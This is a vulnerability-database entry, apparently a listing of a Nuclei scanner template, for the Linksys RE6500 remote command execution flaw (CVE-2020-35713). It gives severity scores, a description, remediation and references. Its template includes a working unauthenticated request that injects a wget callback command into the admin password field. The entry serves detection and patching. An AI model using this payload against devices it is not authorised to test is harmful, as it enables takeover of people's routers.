Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-35713
HistoryJul 15, 2021 - 9:10 a.m.

Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution

2021-07-1509:10:11
ProjectDiscovery
github.com
7
belkin
linksys
re6500
remote command execution
arbitrary commands
firmware
vulnerability
router

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.959

Percentile

99.5%

Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.

id: CVE-2020-35713

info:
  name: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution
  author: gy741
  severity: critical
  description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
  remediation: |
    Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later.
  reference:
    - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt
    - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35713
    - https://bugcrowd.com/disclosures/72d7246b-f77f-4f7f-9bd1-fdc35663cc92/linksys-re6500-unauthenticated-rce-working-across-multiple-fw-versions
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35713
    cwe-id: CWE-78
    epss-score: 0.96521
    epss-percentile: 0.99601
    cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: linksys
    product: re6500_firmware
  tags: cve,cve2020,linksys,rce,oast,router

http:
  - raw:
      - |
        POST /goform/setSysAdm HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/login.shtml

        admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100ee11fe056898e5fd350c49df1dd45943e21f32ee2e4e1a0e5ba8315b3a3c8de3022011191bcaebc6056b7f816437b0c9075fb5d3bd87a2be9c84daa45d5ae8c2596a:922c64590222798bb761d5b6d8e72950

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.959

Percentile

99.5%